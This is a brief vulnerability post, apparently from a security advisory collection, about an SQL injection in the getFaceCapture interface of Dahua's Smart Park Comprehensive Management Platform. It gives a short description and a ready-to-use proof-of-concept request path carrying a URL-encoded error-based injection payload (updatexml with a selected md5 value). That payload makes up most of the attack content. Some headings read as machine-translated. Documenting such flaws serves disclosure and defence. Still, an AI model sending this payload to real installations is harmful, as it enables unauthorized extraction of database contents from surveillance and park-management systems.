Dahua Smart Park Comprehensive Management Platform Getfacecapture Sql Injection Vulnerability
Dahua Smart Park Comprehensive Management Platform Getfacecapture Sql Injection Vulnerability
Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability
Vulnerability Description
Dahua Smart Park Comprehensive Management Platform GetFaceCapture interface has SQL injection vulnerability. The attacker can execute any SQL statement through the vulnerability to obtain database sensitive information.
Vulnerability Impact
Smart Park Comprehensive Management Platform
Network surveying and mapping
Vulnerability reappears
Request a POC
1
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D
This post is licensed under CC BY 4.0 by the author.